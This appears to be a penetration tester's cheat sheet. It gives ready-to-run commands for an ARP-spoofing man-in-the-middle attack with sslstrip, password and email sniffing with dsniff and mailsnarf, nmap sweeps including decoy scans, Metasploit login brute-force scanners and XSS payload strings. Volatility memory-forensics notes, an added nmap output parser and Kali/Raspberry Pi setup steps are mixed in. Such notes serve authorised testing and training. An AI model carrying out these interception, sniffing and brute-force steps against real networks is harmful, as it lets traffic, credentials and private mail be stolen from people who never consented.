MiTM

1. Configure ip forwarding on attacker host

echo 1 > /proc/sys/net/ipv4/ip_forward

2. Redirect HTTP traffic to sslstrip
2a. iptables -t nat -A PREROUTING -i eth0 -p tcp --destination-port 80 -j REDIRECT --to-port 8000
2b. iptables-save

3. SSLStrip
sslstrip -k -l 8000 -w encrypted.txt

4. Ettercap
ettercap -TqM arp:remote <victim_ip> <gateway_ip>

5. Arpspoof
5a. Single host > arpspoof -i eth0 -t <victim_ip> <gateway_ip>
5b. Whole net > arpspoof -i eth0 <gateway_ip>

6. Urlsnarf – capture http
urlsnarf -i eth0

7. Driftnet – capture images
driftnet -i eth0

8. Dsniff – capture passwords
dsniff -i eth0 -w plaintext.txt

9. Mailsnarf – capture emails
mailsnarf -i eth0

Memory analysis :: Volatility

Memory acquisition:
Dump memory using FTK Imager or similar software.

Volatility
Processes:
> volatility pslist -f memory.img

Services:
> volatility svcscan -f memory.img --profile=Win7SP0x64

Hidden/terminated processes:
> volatility psscan -f memory.img

Yara scan:
> volatility yarascan --yara-file=/path/to/rules.yar -f memory.img

nmap

Scan methodology

  1. Scan for live hosts

    1. nmap -sn -oA subnet_live 192.168.1.0/24
  2. Parse list w/ live hosts

    1. cat subnet_live.gnmap | awk '{print $2}' > subnet_live_parsed
  3. Scan hosts for app ver. of top 500 ports

    1. nmap -sS -sV -O --min-parallelism 400 --max-parallelism 512 --script banner.nse,http-headers --top-ports 500 -iL subnet_live_parsed -oA subnet_live_top500
  4. Parse lists for top vuln. ports

    1. All found
      1. cat subnet_live_top500.gnmap | grep '21/open\|22/open\|80/open\|81/open\|85/open\|88/open\|443/open\|1433/open\|3128/open\|3306/open\|5900/open\|8080/open' | awk '{print $2}' > subnet_live_top_vulnports
    2. FTP
      1. cat subnet_live_top500.gnmap | grep 21/open | awk '{print $2}' > subnet_live_ftp
    3. SSH
      1. cat subnet_live_top500.gnmap | grep 22/open | awk '{print $2}' > subnet_live_ssh
    4. MSSQL
      1. cat subnet_live_top500.gnmap | grep 1433/open | awk '{print $2}' > subnet_live_mssql
    5. MYSQL
      1. cat subnet_live_top500.gnmap | grep 3306/open | awk '{print $2}' > subnet_live_mysql
    6. VNC
      1. cat subnet_live_top500.gnmap | grep 5900/open | awk '{print $2}' > subnet_live_vnc
    7. HTTP
      1. cat subnet_live_top500.gnmap | grep 80/open | awk '{print $2}' > subnet_live_http
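The grep-based parsing in steps 2 and 4 has two pitfalls: `awk '{print $2}'` on a .gnmap file also emits "Nmap" from the "# Nmap ... scan initiated" comment lines, and `grep 80/open` matches 8080/open, 180/open and so on, so the wrong hosts end up in subnet_live_http. The following is an added example, not part of the original notes, that parses the greppable format by whole port token; the .gnmap content is a constructed sample in nmap's -oG layout.

```shell
#!/bin/sh
# Added example (not from the original notes): parse nmap greppable (-oG / -oA .gnmap)
# output by exact port token instead of substring grep.

# Constructed sample of what nmap writes to a .gnmap file: an -sn sweep and a port
# scan merged, plus the comment lines nmap adds at the top and bottom.
sample_gnmap() {
    printf '# Nmap 7.80 scan initiated (constructed sample)\n'
    printf 'Host: 192.168.1.1 ()\tStatus: Up\n'
    printf 'Host: 192.168.1.1 ()\tPorts: 80/open/tcp//http//lighttpd/, 443/open/tcp//https///\tIgnored State: closed (998)\n'
    printf 'Host: 192.168.1.5 (nas.lan)\tStatus: Up\n'
    printf 'Host: 192.168.1.5 (nas.lan)\tPorts: 22/open/tcp//ssh//OpenSSH 7.4/, 8080/open/tcp//http-proxy///, 21/filtered/tcp//ftp///\tIgnored State: closed (997)\n'
    printf 'Host: 192.168.1.9 ()\tStatus: Down\n'
    printf '# Nmap done (constructed sample) -- 3 IP addresses (2 hosts up) scanned\n'
}

# Hosts reported Up (stdin: gnmap text). Fields are tab separated, so $1 is
# "Host: <ip> (<name>)" and $2 is "Status: Up"; comment lines and Down hosts are skipped.
live_hosts() {
    awk -F '\t' '$1 ~ /^Host:/ && $2 == "Status: Up" { split($1, h, " "); print h[2] }'
}

# Hosts with exactly port $1 in state open (stdin: gnmap text). The Ports field is
# split on ", " and each entry is port/state/proto/owner/service/rpc/version/, so
# port and state are compared as whole tokens (8080/open never matches 80).
hosts_with_open_port() {
    awk -F '\t' -v want="$1" '
        $1 ~ /^Host:/ && $2 ~ /^Ports: / {
            split($1, h, " ")
            sub(/^Ports: /, "", $2)
            n = split($2, entry, ", ")
            for (i = 1; i <= n; i++) {
                split(entry[i], f, "/")
                if (f[1] == want && f[2] == "open") { print h[2]; break }
            }
        }'
}

# Usage with the files from the methodology above, e.g.:
#   live_hosts < subnet_live.gnmap > subnet_live_parsed
#   hosts_with_open_port 80 < subnet_live_top500.gnmap > subnet_live_http
sample_gnmap | hosts_with_open_port 80   # prints 192.168.1.1 only; 8080 on .5 is not a match
```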

Metasploit scans of found hosts & their respective ports

  1. FTP scan :: msf > use auxiliary/scanner/ftp/ftp_login
  2. SSH scan :: msf > use auxiliary/scanner/ssh/ssh_login
  3. MSSQL scan :: msf > use auxiliary/scanner/mssql/mssql_login
  4. SNMP scan :: msf > use auxiliary/scanner/snmp/snmp_enum; snmp_login
  5. MYSQL scan :: msf > use auxiliary/scanner/mysql/mysql_login
  6. VNC scan :: msf > use auxiliary/scanner/vnc/vnc_login

Top Ports

nmap -sS -sV -O --min-parallelism 400 --max-parallelism 512 --script banner.nse,http-headers --top-ports 500 192.168.1.1

Search for BMC Vuln

nmap -p 49152 -n -oA ./bmc_vuln.txt --min-parallelism 512 --min-rate 400 -Pn 192.168.1.0/24

Search for MSSQL

  • nmap -sV -p T:1433 -n -oG ./scans/mssql_tcp_1433_scan.txt -Pn --min-parallelism 512 --min-rate 400 [ip_range]
  • nmap -p 1433 -oG ./scans/mssql_tcp_1433_scan.txt --script ms-sql-info --script-args mssql.instance-port=1433 --min-parallelism 512 --min-rate 400 [ip_range]

Web server enumeration
nmap -sV --script=http-enum [target_ip]

Check for vulns.
nmap --script=smb-check-vulns -p445 [target_ip]

dns-blacklist
nmap -sn [target_ip] --script=dns-blacklist

SQLi
nmap -T4 -A -v --script=sql-injection [target_ip]

Decoy scan
nmap -D RND:10 [target_ip]

nmap -D decoy1,decoy2,etc [target_ip]

Live hosts
nmap -sn [target_net]

Host scan
nmap -sS -Pn -n -PS [target_ip]

Host service scan
nmap -sS -Pn -n -A [target_ip]

Hosts down
nmap -v -sn -oG - [target_ip] | grep Down


Scripts :: Kali

KAAISv3 by rawstring

  • wget http://sourceforge.net/projects/kaais/files/kaaisv3.sh

netool.sh v4.3 by peterubuntu10

  • wget http://downloads.sourceforge.net/project/netoolsh/opensource%5Bkali%5D.tar.gz

Lazy Kali

https://code.google.com/p/lazykali/

  • wget https://lazykali.googlecode.com/files/lazykali.sh
  • wget https://lazykali.googlecode.com/files/hackpack.tar.gz

Pentesh.sh by phillips321.co.uk

  • svn checkout http://phillips321.googlecode.com/svn/trunk/ phillips321

Discover.sh by Lee Baird

  • git clone https://github.com/leebaird/discover.git

1st setup :: Kali

Correct sources.list

nano /etc/apt/sources.list
Add the following to sources.list:

Regular repos
deb http://http.kali.org/kali kali main non-free contrib
deb http://security.kali.org/kali-security kali/updates main contrib non-free

Bleeding Edge repos
deb http://http.kali.org/kali kali-bleeding-edge contrib non-free main

# apt-get update
# apt-get upgrade

In VBox Environ

VBox Additions
1. apt-get update && apt-get install linux-headers-$(uname -r) -y
2. mount VBoxAdditions package
3. copy install package (VBoxLinuxAdditions.run) to /tmp
4. chmod 755 /tmp/VBoxLinuxAdditions.run
5. /tmp/VBoxLinuxAdditions.run
6. logout or reboot guest machine

Update

  • apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y && reboot


XSS

XSS_Hackem

Test cases:

  • >"'><script>alert('XSS')</script>
  • >%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>
  • AK%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OS%22
  • %22%2Balert(%27XSS%27)%2B%22
  • <table background="javascript:alert([code])"></table>
  • <object type=text/html data="javascript:alert([code]);"></object>
  • <body onload="javascript:alert([code])"></body>

Kali Pi :: Initial Setup

Networking

[Static IP]
nano /etc/network/interfaces

Add the following lines at the bottom of the file (comment out the lines above except the loopback iface):

auto eth0
allow-hotplug eth0
iface eth0 inet static
address 192.168.1.8
netmask 255.255.255.0
gateway 192.168.1.1

[DNS Conf]
nano /etc/resolv.conf
nameserver 192.168.1.1
nameserver 8.8.8.8

[Assign static default gateway]
ip route add default via 192.168.1.1

[Restart networking]
/etc/init.d/networking restart

Rebuild ssh keys
rm /etc/ssh/ssh_host_*
dpkg-reconfigure openssh-server
service ssh restart

Expand USB
run /scripts/rpi-wiggle.sh

Update Kali
apt-get update && apt-get -y upgrade && apt-get -y dist-upgrade && apt-get autoremove && reboot

Check service status
service ssh status
service postgresql status
service apache2 status

Apps

- TightVNC
apt-get install tightvncserver
update-rc.d tightvncserver enable

[Reset password]
vncpasswd

- Metasploit
apt-get install metasploit-framework
update-rc.d metasploit-framework enable

- LazyKali
wget lazykali.googlecode.com/files/lazykali.sh
wget lazykali.googlecode.com/files/hackpack.tar.gz

Make services persistent
update-rc.d ssh enable
update-rc.d apache2 enable
update-rc.d postgresql enable
update-rc.d metasploit-framework enable